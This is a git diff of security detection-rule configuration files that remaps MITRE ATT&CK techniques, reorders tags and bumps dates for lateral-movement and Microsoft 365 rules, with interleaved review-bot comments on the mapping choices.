@@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml index b4d4e4a8ff6..2a44e9de8ee 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -96,14 +96,13 @@ Machine learning models in security environments analyze file transfer patterns - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml index bc0292876e8..cb00727c844 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml index 04f5ad44500..2fba6b44191 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -96,14 +96,13 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml index 8cc42195af1..3f4e83cc4ef 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -95,14 +95,13 @@ The detection of unusual remote file extensions leverages machine learning to id - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - 
diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml index 027b7598adf..cf9b04d1252 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml index e511ab60262..1534efbce1e 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -95,14 +95,18 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml index d5bcf1bf496..39d87498cf6 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -94,14 +94,18 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml index d66e8ddd4dc..009b8ed2300 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 
@@ -52,13 +52,7 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Lateral Movement Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -97,14 +91,26 @@ Remote file transfer technologies facilitate data sharing across networks, essen - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml index be5de02f9db..f6ba1598c0b 100644 --- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml 
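Review bot: The second hunk adds T1048 Exfiltration Over Alternative Protocol (TA0010) to a job that scores a spike in remote file transfers, while keeping T1570 Lateral Tool Transfer for the same signal. T1048 asserts data leaving the environment over a non-C2 channel, which a volume spike in internal file transfers does not by itself establish, so the Exfiltration mapping reads as over-claiming; if it stays, the `note` should tell the analyst what distinguishes an exfiltration case from a tool-transfer case (destination outside the estate, direction of the transfer). Also `reference = "https://attack.mitre.org/techniques/T1048/"` abuts `[rule.threat.tactic]` with no blank line, unlike the T1570 block below it.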
+++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml index e79eaca74da..ba63cde5f17 100644 --- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml +++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,19 +67,7 @@ references = [ risk_score = 47 rule_id = "0e524fa6-eed3-11ef-82b4-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Domain: Storage", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Storage", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: SharePoint", "Data Source: OneDrive", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -146,11 +134,3 @@ reference = "https://attack.mitre.org/techniques/T1530/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index f2e5eb1098f..517692da649 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -62,16 +62,7 @@ references = [ risk_score = 47 rule_id = "491651da-125b-11f1-af7d-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,31 +77,23 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index bcad5515b25..1b66c64fc1b 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -50,15 +50,7 @@ references = [ risk_score = 73 rule_id = "fcd2e4be-6ec4-482f-9222-6245367cd738" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -75,48 +67,31 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - 
diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index d9d60e52102..9ee8b45d02c 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/10" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -127,29 +127,18 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 692780a6416..0dc0777f315 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml +++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
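Review bot: Dropping T1110.001 Password Guessing and T1110.004 Credential Stuffing leaves Password Spraying as the only sub-technique for an account-lockout rule, but lockouts are produced just as readily by many attempts against a single account. Unless the ES|QL query (outside this hunk) aggregates across many distinct users per source, T1110.001 is at least as plausible and should be kept, or the `description` should state that the threshold is tuned for spraying specifically. The tactic itself is unchanged, so no `tags` change is needed for this file.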
@@ -188,48 +188,18 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 8574d32b915..943ff042f2e 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
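Review bot: This hunk removes the Credential Access (T1528) and Initial Access (T1566.002) entries, but no `tags` hunk for this file appears between its date bump and this hunk, so if the existing tags carry `"Tactic: Credential Access"` or `"Tactic: Initial Access"` they are now orphaned and should be removed in the same commit (Defense Evasion is the only remaining tactic). The removal also changes which ATT&CK tactics this rule counts toward in coverage reporting; a one-line rationale in the commit message would help, since the rule's file name still centres on a suspicious OAuth2 authorization rather than on token reuse alone.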
@@ -80,11 +80,16 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index 1a63debc029..df05815d262 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://twitter.com/misconfig/status/1476144066807140355"] risk_score = 47 rule_id = "675239ea-c1bc-4467-a6d3-b9e2cc7f676d" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Tactic: Initial Access", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -75,23 +75,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 9b65cad7179..1fce09f533f 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index aeb5c15781c..6fb8a45115b 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml index 42f4af5cf54..0ba6cba943d 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index 7b81c5b2bd0..e6ea0aaf6ec 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -107,17 +107,13 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 98575d9075a..51150629c75 100644 
